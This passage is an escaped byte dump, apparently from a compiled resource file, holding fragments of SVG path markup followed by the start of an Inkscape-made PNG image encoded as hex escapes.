fil\\\nl=\\x22#6ff3f7\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 579\\\n.03,597.47 c 0.8\\\n3,3.66 0.95,7.42\\\n 1.12,11.17 -1.9\\\n8,-1.77 -3.85,-3\\\n.65 -5.7,-5.53 1\\\n.49,-1.91 3.01,-\\\n3.8 4.58,-5.64 z\\\n\\x22\\x0d\\x0a id=\\x22pa\\\nth49\\x22\\x0d\\x0a st\\\nyle=\\x22fill:url(#l\\\ninearGradient73)\\\n\\x22 />\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a\\\n \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n\\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a <\\\npath\\x0d\\x0a fil\\\nl=\\x22#6ff3f7\\x22\\x0d\\x0a \\\n opacity=\\x221\\x22\\x0d\\\n\\x0a d=\\x22m 405\\\n.47,770.53 c 0.6\\\n2,-0.17 1.85,-0.\\\n5 2.46,-0.67 0.0\\\n3,1.38 0.06,2.77\\\n 0.1,4.16 -0.8,-\\\n0.02 -2.38,-0.06\\\n -3.18,-0.09 0.2\\\n,-1.14 0.41,-2.2\\\n8 0.62,-3.4 z\\x22\\x0d\\x0a\\\n id=\\x22path7\\\n1\\x22\\x0d\\x0a style\\\n=\\x22fill:url(#line\\\narGradient73)\\x22 /\\\n>\\x0d\\x0a \\x0d\\x0a \\\n\\x0d\\x0a \\x0d\\x0a\\\n\\x0d\\x0a\\\n\\x00\\x00\\xec\\xa4\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x02\\xb4\\x00\\x00\\x01\\xe9\\x08\\x06\\x00\\x00\\x00s\\xc6\\xafn\\\n\\x00\\x00\\x00\\x09pHYs\\x00\\x00\\x0e\\xc3\\x00\\x00\\x0e\\xc3\\\n\\x01\\xc7o\\xa8d\\x00\\x00\\x00\\x19tEXtSof\\\ntware\\x00www.inksca\\\npe.org\\x9b\\xee<\\x1a\\x00\\x00 \\x00ID\\\nATx\\x9c\\xec\\x9dwX\\x15\\xe7\\xf2\\xf8\\xe7\\xd0\\xbbT\\\n\\x01\\x11A\\x14+\\x8a\\xbdF\\x8d]lX\\x82F\\x93\\xa8\\\nI4\\xb1\\xe5\\xa6\\x18o\\x8c)7\\xc6\\x18\\xcdM4\\xb9\\\n\\xa9\\xde\\xdcX\\xc0\\xc4\\xae\\xd1\\x10+\\xa2D\\xc5\\x82\\x8a\\x1a\\\n\\x0bX\\x01E\\xaaH\\xef\\x87\\xf3\\xfe\\xfe\\xf0{\\xfc!r\\\n8;\\xb3\\xef\\x9es\\xc0\\xf7\\xf3<\\xfb\\xdc\\x1b\\xd9yg\\\nv\\xcf\\xee\\xbb\\xb3\\xb3\\xf3\\xce\\xa8\\x18c\\x0c\\x04\\x02\\x81@\\\n 
\\xe0L\\xbf~\\xfd\\xe0\\xf8\\xf1\\xe3(\\x99\\xf4\\xf4t\\xf0\\\n\\xf2\\xf2R\\xc8\\x22\\x81@\\xd0P13\\xb6\\x01\\x02\\x81@\\\n h\\x98\\xdc\\xbcy\\x13\\xb5\\xbf\\x83\\x83\\x03xzz*\\\nd\\x8d@ h\\xc8\\x08\\x87V \\x10\\x08\\x04\\xdc)*\\\n*\\x82\\xcc\\xccL\\x94L\\xcb\\x96-A\\xa5R)d\\x91\\\n@ h\\xc8X\\x18\\xdb\\x00\\x81@ \\x104\\x5c\\xbb\\\nv\\x8d\\xf7\\xb0\\x06\\xc1\\xd1\\xd1\\x11v\\xee\\xdcil3\\x04\\\n\\x02\\x01\\x81;w\\xee\\xc0\\xab\\xaf\\xbe\\x8a\\x96\\x0b\\x0e\\x0e\\x86\\\n\\xaf\\xbe\\xfaJ\\x01\\x8b\\x1e',,\\x0c\\xf2\\xf2\\xf2\\xd0r\\\n\\x0b\\x16,\\x80\\x11#F(`\\xd1\\xff\\xe7\\xec\\xd9\\xb3\\xf0\\\n\\xfe\\xfb\\xef\\xa3\\xe5\\xdc\\xdd\\xdda\\xd3\\xa6M\\xb5\\xfe\\x0d\\x9b\\\nn\\x00P\\xff\\x1d\\xda\\xd2\\xd2R\\xf8\\xe6\\x9bo \\x22\\x22\\\n\\x02\\x12\\x13\\x13\\x1f\\xfb\\x9b\\xb5\\xb55\\x0c\\x1f>\\x1c>\\xff\\\n\\xfcsh\\xdf\\xbe\\xbd\\x91,\\x14\\x08\\x1a.\\xdc\\x1d\\xdam\\\n\\xdb\\xb6AVV\\x16\\xefa\\x0dB\\xf7\\xee\\xdd\\x8dm\\x82\\\n@ \\xa2R\\xa9\\xe0\\xd0\\xa1Ch\\xb9\\xf2\\xf2r\\x05\\\n\\xacy\\x9c\\x84\\x84\\x04\\xd8\\xbe};I6,,\\x8c\\xb3\\\n5O\\xb2k\\xd7.\\xd2\\xb9\\xab\\xeb\\x05\\xe2ish\\xaf\\\n]\\xbb\\x06!!!\\x90\\x94\\x94T\\xeb\\xdf\\xcb\\xcb\\xcb\\xe1\\\n\\x8f?\\xfe\\x80\\xfd\\xfb\\xf7\\xc3\\xa6M\\x9b`\\xc2\\x84\\x09\\x06\\\n\\xb6P h\\xd8p\\xcd\\xa1-((\\xa8\\xb7\\xce,\\x00\\\n@\\x9b6m\\x8cm\\x82@ \\xd2\\xa8Q#\\x92\\x5c\\\nee%gK\\x9e\\xe4\\xc0\\x81\\x03dYC\\xd8\\xb7\\x7f\\\n\\xff~\\x92\\xdc\\xc4\\x89\\x13u\\xfe\\xedirh\\x93\\x92\\x92\\\n\\xa0\\x7f\\xff\\xfe:\\x9d\\xd9\\xeaTTT\\xc0\\x0b/\\xbc\\x00\\\n\\x17/^4\\x80e\\x02\\xc1\\xd3\\x03W\\x87\\xf6\\xd6\\xad[\\\n<\\x8738\\xad[\\xb76\\xb6\\x09\\x02\\x81\\x80\\x88\\x83\\x83\\\n\\x03\\x98\\x99\\xe1\\xa74Sv\\x18\\x01\\x94\\xb7/++\\x0b\\\n\\xce\\x9f?\\x8f\\x96k\\xd4\\xa8\\x11\\x0c\\x1e\\x14\\x87\\xb6>\\xbeT\\\n\\xde\\xbd{W\\x96|\\x87\\x0e\\x1d8Y\\x22\\x10\\x08\\xb89\\\n\\xb4\\x94\\x9c)SB|rn8\\x14\\x17\\x17Cjj\\\n*JF8\\xb4\\x0d\\x03S\\x8b\\xd0\\xca\\xcd\\x9f\\x05xX\\\n\\x16J\\x09\\xf2\\xf3\\xf3\\xe1\\xd4\\xa9Sh\\xb9!C\\x86\\xe8\\\n}qxZ\\x22\\xb4EEEdYwww\\x08\\x08\\\n\\x08\\xe0h\\x8d@\\xf0t\\xc3\\xcd\\xa1\\xad\\xcf\\xf9\\xb3\\x00\\x22\\\nB\\xdb\\x90\\xb8v\\xed\\x1a\\xea\\xe5J\\xa5R\\xd5\\xcb\\xe8\\x90\\\n\\xe0IL)\\x87V\\xadV\\xc3\\xe1\\xc3\\x87\\xb9\\x8c\\xa3\\x04\\\n\\x87\\x0e\\x1d\\x22\\x8d]Wu\\x03-\\xd8\\xe7\\x81\\xad\\xad-\\\n\\xf8\\xf8\\xf8\\xa0m16\\xae\\xae\\xaed\\xd9\\x89\\x13'\\xd6\\\n\\xbb\\xaa\\x0e\\x02\\x81)\\xc35B[\\x9f\\x11\\x0em\\xc3\\xe1\\\n\\xfa\\xf5\\xeb\\xa8\\xfd\\xbd\\xbd\\xbd\\xc1\\xd1\\xd1Q!k\\x04\\x86\\\n\\xc4\\x94\\x22\\xb4'N\\x9c@\\x97\\x10\\xab\\x0d\\xa5\\x22\\xb4\\x94\\\n\\xe8\\xb1\\x85\\x85\\x05\\x8c\\x1d;\\xb6\\xce}(\\xe9g-Z\\\n\\xb4 
5\\xc506\\xd4/{*\\x95\\x0af\\xce\\x9c\\xc9\\\n\\xd9\\x1a\\x81\\xe0\\xe9\\xc6\\xe8\\x11\\xda\\xe4\\xe4d`\\x8c\\x19}\\\nsss\\xe3u*\\x04FF\\xe4\\xcf>\\xbd\\x98R\\x84\\\n\\x96G\\xba\\x01\\x80i\\xd97`\\xc0\\x00\\xbds\\xe5\\xed\\xdb\\\n\\xb7\\xd1\\x8d\\x1a\\xeac\\xc9.\\x00@7o\\xd1\\x12\\x16\\x16\\\n\\x06\\xdd\\xbau\\xe3l\\x8d@\\xf0tcT\\x87\\xd6\\xda\\xda\\\n\\x1a\\x9a6m\\xca\\xcb\\x04\\x81\\x00\\x00\\xf0\\x0e\\xad\\xc8\\x9fn\\\n8P\\x1cZ\\x8dFC\\xea\\x94\\xa5\\x0f\\x1e\\x0b\\xc2\\x00\\x94\\\nI9\\xb8z\\xf5*\\xdc\\xb9s\\x07-'%\\xdd\\xe0i\\\n)\\xd9\\x05\\x00\\xf0\\xdak\\xaf\\xa1+\\x154k\\xd6\\x0c\\xbe\\\n\\xff\\xfe{\\x85,\\x12\\x08\\x9e^\\x8c\\x9ar\\xd0\\xbcys\\\n077\\xe7e\\x82@\\x00\\x00\\xf8\\x1a\\xb4\\xf5\\xf5a*\\\nx\\x12j\\xb77\\xde\\x9f\\xf5333\\xe1\\xc2\\x85\\x0b\\x5c\\\n\\xc6R\\x22BK\\x89\\xce\\x9a\\x99\\x99\\xc1\\xb8q\\xe3\\xf4\\xee\\\nGy\\x16\\xd4\\xc7\\x05a\\x00\\x0f_\\xa0V\\xaf^\\x0d\\x16\\\n\\x16\\xd2\\x9an6i\\xd2\\x04\\xfe\\xfc\\xf3O\\xf0\\xf0\\xf0P\\\n\\xd82\\x81\\xe0\\xe9\\x83\\x8bC[QQAz\\xdb\\xaf\\xaf\\\n\\x9f\\x99\\x04\\xa6\\x8bF\\xa3A\\xe7\\xd0\\x8a\\x94\\x83\\x86\\x03\\xd5\\\n\\xa1\\xe5\\xed4FEEq\\x8b\\xfa\\x9a\\x8aC\\xdb\\xbbw\\\no\\xf0\\xf6\\xf6\\xd6\\xbb\\x1f\\xe5k]}~\\x16\\x84\\x86\\x86\\\n\\xc2\\xf6\\xed\\xdb\\xeb<7*\\x95\\x0a&N\\x9c\\x08\\xa7N\\\n\\x9d\\x12\\xa5\\xba\\x04\\x02\\x85\\x90\\xf6Z\\xa9\\x87\\xe4\\xe4d\\xa8\\\n\\xaa\\xaaB\\xcb\\xd5\\xe7IL`\\x9a\\xdc\\xbd{\\x17JJ\\\nJP2\\xc2\\xa1m8PR\\x0e\\x00\\xf8;\\x8d\\xbc\\xd2\\\n\\x0d\\x00\\xf8\\xdbVZZ\\x0aG\\x8f\\x1eE\\xcb\\xe9k\\xa6\\\n\\xa0\\xe5i\\xa9A[\\x9d\\xd0\\xd0P\\x184h\\x10\\xfc\\xf1\\\n\\xc7\\x1fp\\xe4\\xc8\\x11\\xc8\\xc8\\xc8\\x00\\x8dF\\x03\\xee\\xee\\xee\\\n\\xd0\\xa9S'\\x189r\\xa4Xx,\\x10(\\x0c\\x17\\x87\\\n\\x96\\xba L8\\xb4\\x02\\xde`\\xf3g-,,D-\\\n\\xc8\\x06\\x045B\\xcb3OU\\xa3\\xd1@TT\\x14\\xb7\\\n\\xf1x;\\xb4111PZZ\\x8a\\x96\\x1b?~\\xbc\\\n\\xa4\\xfd\\xb09\\xb4\\x0de-\\x85\\xa3\\xa3#\\xbc\\xf0\\xc2\\x0b\\\n\\xf0\\xc2\\x0b/\\x18\\xdb\\x14\\x81\\xe0\\xa9\\x84K\\xca\\x81ph\\\n\\x05\\xa6\\x026\\x7f\\xb6y\\xf3\\xe6`ii\\xa9\\x905\\x02\\\nCC\\x8d\\xd0\\xf2th\\xe3\\xe3\\xe3!++\\x8b\\xdbx\\\n\\xbc\\x1dZJ\\xbaA\\xb7n\\xdd\\xa0y\\xf3\\xe6z\\xf7+\\\n//G75\\xa9\\xaf%\\xbb\\x04\\x02\\x81i\\xc1e\\x16\\\n\\xa1\\xd6\\xa0\\x15\\x0e\\xad\\x807X\\x87V\\xa4\\x1b4,L\\\n!\\x87\\x96g\\xba\\x01\\x80i\\xa4CHM7\\xb8}\\xfb\\\n6:\\xfd\\xac\\xbe\\xa7\\x1b\\x08\\x04\\x02\\xd3\\xc0h\\x11Z\\x0b\\\n\\x0b\\x0bh\\xd6\\xac\\x19\\x0f\\xf5\\x02\\xc1#D\\xc9\\xae\\xa7\\x1b\\\n\\x1b\\x1b\\x1b\\xb0\\xb2\\xb2B\\xcb\\xf1t\\x1ay\\xd5\\x9f\\xd5\\xc2\\\n\\xd3\\xb6\\xe4\\xe4d\\xf4K\\x1f\\x80r\\xe9\\x06\\x00\\x22\\xb0!\\\n\\x10\\x08\\xf8`4\\x87V|\\xea\\x15(\\x01\\xd6\\xa1\\x15\\xd1\\\n\\xa1\\x86\\x871\\x9b+\\x14\\x14\\x14\\xc0\\xe9\\xd3\\xa7\\xb9\\x8c\\xa5\\\n\\x85g:\\x04%:\\x1b\\x14\\x14$yA\\xd3\\xd3V\\xe1\\\n@ \\x10\\x98\\x0e\\xb2\\x1d\\xda\\xaa\\xaa*HNNF\\xcb\\\n\\x89IL\\xc0\\x9b\\xc2\\xc2BHOOG\\xc9\\x88\\x94\\x83\\\n\\x86\\x871\\xdb\\xdfFEEqO\\x110v\\xf4Xj\\\n\\xba\\x01\\x00-\\xfdL<\\x0b\\x04\\x02\\x01\\x0fd;\\xb4w\\\n\\xee\\xdc!\\x15%\\x17\\x93\\x98\\x807\\x89\\x89\\x89\\xc0\\x18C\\\n\\xc9\\x08\\x87\\xb6\\xe1a\\xcc\\x08-\\xeft\\x03\\x00~\\xb6\\xa9\\\n\\xd5j8r\\xe4\\x08ZNJw0-\\x22\\xe5@ 
\\\n\\x10\\x18\\x0b\\xd9e\\xbb\\xa8\\x0b\\xc2\\xeakg\\x98\\xba\\xa8\\xac\\\n\\xac\\x84\\xbf\\xff\\xfe\\x1b\\xce\\x9d;\\x07\\xd7\\xaf_\\x87\\xbc\\xbc\\\n<(((\\x00{{{prr\\x82\\xf6\\xed\\xdbC\\\n\\xd7\\xae]\\xa1K\\x97.\\xa0R\\xa9\\x8cm.\\x9a\\xd4\\xd4\\\nT\\x88\\x8d\\x8d\\x85\\x84\\x84\\x04\\xb8y\\xf3&dffB\\\nQQ\\x11TVVB\\xa3F\\x8d\\xc0\\xc9\\xc9\\x09\\x9a7\\\no\\x0eAAA\\xd0\\xad[7\\xe8\\xd8\\xb1\\xa3A\\xed\\xc3\\\n\\xe6\\x06\\xda\\xdb\\xdb\\x83\\x8f\\x8f\\x8fB\\xd6\\xd0\\xc9\\xca\\xca\\x82\\\ns\\xe7\\xce\\xc1\\x85\\x0b\\x17 %%\\x05RSS\\xa1\\xa8\\\n\\xa8\\x08\\x8a\\x8a\\x8a\\x00\\x00\\xc0\\xc1\\xc1\\x01\\x1c\\x1d\\x1d\\xc1\\xd7\\\n\\xd7\\x17\\xfc\\xfd\\xfd\\xa1k\\xd7\\xae\\xd0\\xad[7\\xf2\\x82\\xa8\\\n\\xfa@AA\\x01$$$@bb\\x22\\xe4\\xe4\\xe4@\\\naa!\\x8c\\x181\\x02z\\xf6\\xec\\xf9\\xc4\\xbe\\xce\\xce\\xce\\\n\\xe8\\xf1yu\\x0a3e\\x87\\xf6\\xc4\\x89\\x13\\x90\\x9f\\x9f\\x8f\\\n\\x92i\\xd1\\xa2\\x05\\xea>\\xc6>\\x0f\\xac\\xad\\xad\\xc1\\xd7\\xd7\\\n\\x17%#\\xd0Mvv6\\xc4\\xc6\\xc6\\xc2\\x95+W\\xe0\\\n\\xe6\\xcd\\x9bp\\xef\\xde=(..\\x86\\xf2\\xf2rpt\\\nt|4ot\\xec\\xd8\\x11:u\\xea\\x04\\xdd\\xbau\\xab\\\n\\x97\\xdd:o\\xdc\\xb8\\x01\\x87\\x0f\\x1f\\x86K\\x97.\\xc1\\xad\\\n[\\xb7\\xa0\\xb0\\xb0\\x10\\xca\\xca\\xca\\xc0\\xc5\\xc5\\x05\\xdc\\xdc\\xdc\\\n ((\\x08z\\xf6\\xec\\x09\\xfd\\xfa\\xf5\\x03\\x1b\\x1b\\x1bc\\\n\\x9b\\x8b\\xa2\\xac\\xac\\x0c.\\x5c\\xb8\\x00\\xe7\\xcf\\x9f\\x87\\xeb\\xd7\\\n\\xaf\\xc3\\xdd\\xbbw!??\\x1frss\\x01\\xe0\\xe1=\\\n\\xe3\\xe0\\xe0\\x00^^^\\xe0\\xef\\xef\\x0fAAA\\xd0\\xa3\\\nG\\x0f\\xf0\\xf3\\xf33\\xb2\\xe5\\xcaQYY\\x097o\\xde\\\n\\x84+W\\xae@zz:\\x14\\x15\\x15\\x81\\x87\\x87\\x07\\xcc\\\n\\x9c9\\xf3\\xb1\\xfdd;\\xb4\\xd4\\x92]\\x0d\\xc9\\xa1\\x8d\\x89\\\n\\x89\\x81\\x0d\\x1b6\\xc0\\xef\\xbf\\xff\\xfe\\xe8\\xa2\\xab\\x0b__\\\n_x\\xe1\\x85\\x17`\\xc1\\x82\\x05\\xe0\\xee\\xee^\\xeb>\\xdb\\\n\\xb7oG?\\x1cf\\xcd\\x9a\\x05\\xae\\xae\\xae(\\x19}\\xc4\\\n\\xc5\\xc5\\xc1\\xd6\\xad[\\xe1\\xf7\\xdf\\x7f\\x87\\xdb\\xb7o\\xa3d\\\n}}}a\\xcc\\x9810s\\xe6L\\xe8\\xdc\\xb9\\xb3,\\\n;n\\xde\\xbc\\x09;v\\xec\\xa8s\\x1fl\\xf4\\xc9\\xce\\xce\\\n\\x0e\\xfe\\xfd\\xef\\x7f\\x93\\xec\\xf1\\xf5\\xf5\\x85\\xa9S\\xa7\\x92d\\\nk#99\\x19\\xc2\\xc3\\xc3!22\\x12\\xe2\\xe3\\xe3\\xd1\\\n\\x91f\\x0b\\x0b\\x0b\\xe8\\xdf\\xbf?L\\x9a4\\x09^|\\xf1\\\nE\\xb0\\xb7\\xb7\\xe7f\\x9b.JKK!((\\x08%\\\n\\xf3\\xea\\xab\\xaf\\xc2\\xe2\\xc5\\x8b\\xf5\\xeeWQQ\\x01G\\x8e\\\n\\x1c\\x81\\xbd{\\xf7\\xc2\\x81\\x03\\x07j}Y\\xd1uMQ\\\n\\x22\\xb4<\\xf2T\\xaf^\\xbdJ\\xea\\x98\\xa8\\x0f^\\x0e\\xad\\\n\\x92\\xd5\\x0d\\x00\\x1e\\xfef)))\\xa8\\xf1\\xa5\\xb4?/\\\n))\\x81\\x98\\x98\\x188v\\xec\\x18\\x5c\\xbat\\x09\\xee\\xdd\\\n\\xbb\\x07\\x05\\x05\\x05`mm\\x0d\\x8d\\x1a5\\x02\\x7f\\x7f\\x7f\\\n\\xe8\\xdc\\xb93\\xf4\\xeb\\xd7\\x0fz\\xf5\\xeae\\xb0`\\xc1/\\\n\\xbf\\xfc\\x02999(\\x99\\x85\\x0b\\x17r/Qv\\xf5\\\n\\xeaU\\xd8\\xb2e\\x0b\\xec\\xdc\\xb9\\x13._\\xbe\\x8c\\x92\\xf5\\\n\\xf0\\xf0\\x80Q\\xa3F\\xc1\\xf4\\xe9\\xd3\\xe1\\xd9g\\x9f\\xe5j\\\n\\x97\\x96\\xfd\\xfb\\xf7\\xc3\\xc5\\x8b\\x17%\\xef\\xdf\\xbf\\x7f\\x7f\\xe8\\\n\\xdd\\xbb\\xf7\\x13\\xff^\\x5c\\x5c\\x0ck\\xd7\\xae\\x85\\x9f~\\xfa\\\n\\x09\\x12\\x12\\x12\\xea\\x1cc\\xcb\\x96-\\x00\\x00\\xe0\\xe2\\xe2\\x02\\\nS\\xa7N\\x85w\\xdey\\xc7\\xa4\\xeb\\x8d\\x17\\x17\\x17\\xc3\\xb6\\\nm\\xdb`\\xc7\\x8e\\x1d\\x10\\x1d\\x1dM\\xaa\\x13\\xdd\\xbauk\\\n\\x980a\\x02\\xcc\\x9a5KR\\x89=\\x1e\\xcc\\x9c9\\x13\\\n\\xf5\\xdc\\xf5\\xf6\\xf6\\x86\\xe3\\xc7\\x8fK\\xda\\xf7\\xef\\xbf\\xff\\x86\\\n\\xbd{\\xf7\\xc2\\xbe}\\xfb\\xe0\\xd4\\xa9SO\\x04\\x1d^z\\\n\\xe9\\xa5'\\x1cZ`2y\\xf7\\xddw\\x19\\x00\\xa0\\xb7\\x8
4\\\n\\x84\\x04\\xb9\\xaa\\x8dNtt4\\xeb\\xdb\\xb7/\\xe9\\xf8\\x01\\\n\\x80999\\xb1o\\xbf\\xfd\\x96i4\\x9a'\\xc6\\xee\\xd2\\\n\\xa5\\x0bz\\xbc\\x82\\x82\\x02.\\xc7U^^\\xce~\\xf9\\xe5\\\n\\x17\\x16\\x1c\\x1cL>\\xb6\\x9a\\xdb\\xc0\\x81\\x03\\xd9\\xa1C\\x87\\\n\\xc86\\xfd\\xf8\\xe3\\x8f\\xdcl\\xe1\\xb1M\\x992\\x85\\xcb\\xb9\\\n>u\\xea\\x14\\x1b9r$333\\xe3f\\x9b\\xab\\xab\\\n+\\xfb\\xfc\\xf3\\xcfYYY\\x19\\x17\\x1buq\\xe9\\xd2%\\\n\\xb4m\\xdf\\x7f\\xff}\\x9dc\\xa6\\xa4\\xa4\\xb0\\xc5\\x8b\\x173\\\nOOO\\xbdc]\\xbat\\xa9\\xd61\\xa6M\\x9b\\x86\\xb6\\\n+::Z\\xf6\\xf9X\\xb5j\\x95\\x22\\xd7Z\\x93&M\\\nd\\xdb\\xc6\\x18mN9y\\xf2\\xa4\\xe4\\xf1\\x13\\x13\\x13\\xd1\\\n\\xe3\\x8f\\x1e=\\xba\\xd6\\xb1\\xaa\\xaa\\xaa\\xd8\\x9e={XX\\\nX\\x18\\xb3\\xb1\\xb1\\x91<^\\xb3f\\xcd\\xd8'\\x9f|\\xc2\\\n\\xf2\\xf2\\xf2\\xb8\\x9c\\xb3\\xbaprrB\\x1dk\\xe3\\xc6\\x8d\\\n\\xb9\\xe9\\xae\\xaa\\xaab\\xdb\\xb6mc\\xfd\\xfa\\xf5\\xe3v\\x9d\\\nu\\xe9\\xd2\\x85m\\xdd\\xba\\xb5\\xd6\\xe7\\x91\\x1cF\\x8d\\x1a\\x85\\\n\\xb2\\xe3\\x87\\x1f~xL^\\xa3\\xd1\\xb0\\xb5k\\xd72\\x0f\\\n\\x0f\\x0f\\xf2\\xb1\\xd9\\xd8\\xd8\\xb0\\x8f>\\xfa\\x88\\x95\\x97\\x97s\\\n=6\\xb9dff\\xb2w\\xdey\\x07}-\\xd5\\xb5\\x99\\\n\\x9b\\x9b\\xb3\\xe7\\x9f\\x7f\\x9e\\xa5\\xa4\\xa4(n\\x7f\\xdb\\xb6m\\\nQ\\xb6=\\xfb\\xec\\xb3u\\x8eW\\x5c\\x5c\\xcc\\xd6\\xacY\\xc3\\\n\\xbau\\xeb\\xa6w\\xac\\x8f?\\xfe\\xf8\\x09y\\xd9\\x0e\\xed\\xb8\\\nq\\xe3H'\\x5c\\xe9\\x87\\xad\\x92\\\n\\x9d\\xdb\\x058q\\xe2\\xc4'\\xceG\\xa3F\\x8dPcx\\\nyyq9\\xb6\\xbd{\\xf7\\xb2V\\xadZq;\\xb6\\x9a\\\n\\xdb\\x981c\\xd8\\xf5\\xeb\\xd7\\xd1v\\xbd\\xf5\\xd6[\\x8a\\xd9\\\nD\\xd9\\xfe\\xf5\\xaf\\x7f\\xc9:\\xcfiii,,,L\\\nQ\\x1b[\\xb7n\\xcd.\\x5c\\xb8 \\xcb\\xce\\xba\\xd8\\xb5k\\\n\\x17\\xda\\xa6\\x03\\x07\\x0e\\xd4:VNN\\x0e\\xfb\\xc7?\\xfe\\\n\\xc1,--%\\x8d\\xa3R\\xa9XQQQ\\xadc\\xcd\\\n\\x9f?\\x1fm\\xd7\\xfe\\xfd\\xfbe\\x9f\\x8fa\\xc3\\x86I\\xd6\\\ngaa!y_\\x0f\\x0f\\x0f\\xd9\\xb6edd0\\x95\\\nJ\\x85:'M\\x9b6E97\\x7f\\xfe\\xf9'\\xfa\\xbc\\\n\\xbf\\xf5\\xd6[\\x8f\\x8d\\xa1\\xd1h\\xd8\\xaf\\xbf\\xfe\\xca\\xda\\xb5\\\nk'\\xeb\\xdawuue?\\xfd\\xf4\\x93\\xec\\xf3\\xa6\\x8b\\\n\\xcc\\xccL\\xb4M}\\xfa\\xf4\\xe1\\xa2\\xfb\\xf4\\xe9\\xd3\\xac{\\\n\\xf7\\xee\\x8a\\xcd\\x1b}\\xfb\\xf6eg\\xce\\x9c\\xe1b+c\\\n\\x0c\\xfd<\\xd9\\xb6m\\xdb#\\xd9\\xec\\xecl6t\\xe8P\\\nn\\xc7\\xd6\\xaf_?\\x96\\x9d\\x9d\\xcd\\xed\\xd8\\xa8TVV\\\n\\xb2\\x7f\\xff\\xfb\\xdf\\xcc\\xde\\xde^\\xb1\\xdf\\xd1\\xce\\xce\\x8e\\xad\\\n^\\xbdZ\\xb1c\\xa8\\xaa\\xaaB\\xbdl\\x02\\x00\\x9b9s\\\n\\xa6\\xce\\xb1\\xd6\\xae]\\xcb\\xbc\\xbd\\xbd%\\x8f\\xb5~\\xfd\\xfa\\\n'\\xc6\\x91\\xed\\xd0\\x06\\x05\\x05\\xa1O\\xb4\\xbf\\xbf\\xbf\\x5c\\xb5\\\nF\\xe3\\xf4\\xe9\\xd3\\xacI\\x93&\\xdc/\\xbe\\x91#G>\\\nz{\\xbc\\x7f\\xff>Z\\xfe\\x99g\\x9e\\x91u\\x5c\\xa5\\xa5\\\n\\xa5l\\xe6\\xcc\\x99\\x8a\\xdd\\x5c\\xd57GGG\\xb6s\\xe7\\\nN\\x94}\\xd8\\xb7|\\xa5\\xb7\\xdf~\\xfb\\x8d|\\xae\\xb7o\\\n\\xdf\\xce\\x9c\\x9d\\x9d\\x0db\\xa7\\x9d\\x9d\\x1d\\xdb\\xb5k\\x17\\xd9\\\n\\xd6\\xba\\xf8\\xea\\xab\\xaf\\xd0\\xf6\\xdc\\xbau\\xeb\\x89q\\xc2\\xc3\\\n\\xc3\\x99\\xab\\xab+j\\x1cOOO\\x9dv}\\xf0\\xc1\\x07\\\nh\\xbb\\x22##e\\x9d\\x8b\\xe2\\xe2b\\xd4\\xe4\\x8eqH\\\n\\x9c\\x9d\\x9de\\xd9\\xc6\\x18c\\x11\\x11\\x11\\xe8s\\xf2\\xc6\\x1b\\\no\\xa0t|\\xf3\\xcd7h\\x1d\\xd5#\\xf6\\xb7o\\xdff\\\n\\x03\\x07\\x0e\\xe4z\\xfd\\x8f\\x1f?\\x9e\\x15\\x16\\x16\\xca>\\x7f\\\n5\\x89\\x8d\\x8dE\\xdb\\xf2\\xd2K/\\xc9\\xd2\\xa9V\\xab\\xd9\\\n\\xc7\\x1f\\x7f\\xcc\\xf5k\\x8e\\xae\\xcd\\xd2\\xd2\\x92}\\xf7\\xddw\\\n\\xb2\\xcfSee\\xa5\\xe4\\x97T\\xed\\x16\\x13\\x13\\xc3\\x18c\\\n\\xec\\xca\\x95+\\xacY\\xb3f\\xdc\\x8f\\xadU\
\xabV,+\\\n+K\\xf6\\xb1Q\\xb9u\\xeb\\x16\\xeb\\xda\\xb5\\xab\\xe2\\xbf\\xa1\\\nv{\\xed\\xb5\\xd7XUU\\x15\\xf7\\xe3HIIA\\xdb\\\n\\xb2b\\xc5\\x8a'\\xc6\\xb9r\\xe5\\x0a\\xe9\\xeb\\xd1_\\x7f\\xfd\\\n\\xf5\\xc4X\\xb2\\x1cZ\\x8dF\\xc3\\xec\\xec\\xec\\xd0\\x86\\x0c\\x19\\\n2D\\x8eZ\\xa3\\xb1y\\xf3ffkk\\xab\\xd8\\x85\\xa7\\\n}\\x80\\xc4\\xc5\\xc5\\xa1e\\xa7O\\x9fN>\\xae\\xf4\\xf4t\\\n\\xd6\\xb9sg\\x83\\xdd`\\x00\\x0f#l\\xcb\\x97/\\x97l\\\nc``\\xa0A\\xed\\xd3\\xb7\\xc5\\xc5\\xc5\\xa1\\xcf\\xb3F\\xa3\\\na\\x8b\\x16-BG\\xca\\xe4nVVV\\xec\\xcf?\\xff\\\nD\\xdb\\xab\\x8f\\xd9\\xb3g\\xa3\\xedP\\xab\\xd5\\x8f\\xe4\\xcb\\xcb\\\n\\xcb\\xd9\\xdc\\xb9sI\\xc7\\xd4\\xabW/\\x9dv}\\xf1\\xc5\\\n\\x17\\xe8\\xf1\\xb0/X5\\xd9\\xbbw/J\\xdf\\xdbo\\xbf\\\n-y_{{{Y\\xb61\\xc6\\xd8\\xd4\\xa9S\\xd1\\xe7\\\n\\xe4\\xc8\\x91#(\\x1d\\x94\\xc8\\xb86b\\x1f\\x15\\x15\\x85\\xfe\\\n*%u\\x1b:t(\\xf7O\\xcd\\x94\\x17\\x84%K\\x96\\\n\\x90\\xf5\\x15\\x16\\x16\\xa2\\xbe\\x00\\xf0\\xda^\\x7f\\xfduY)\\\n\\x087o\\xdeD\\xeb\\xbcz\\xf5*\\xbbt\\xe9\\x12k\\xdc\\\n\\xb8\\xb1b\\xc7\\xd5\\xb3gOV\\x5c\\x5cL>.*\\x87\\\n\\x0e\\x1db...\\x06\\xff\\x1duEF\\xe5\\x10\\x1d\\x1d\\\n\\x8d\\xb6c\\xc7\\x8e\\x1d\\x8f\\x8d\\xb1}\\xfbv\\xe6\\xe8\\xe8H\\\n:\\xa6\\xbbw\\xef>a\\x93,\\x87655\\x95d\\xc8\\\n\\xec\\xd9\\xb3\\xe5\\xa85\\x0a\\xeb\\xd6\\xadS\\xfc\\x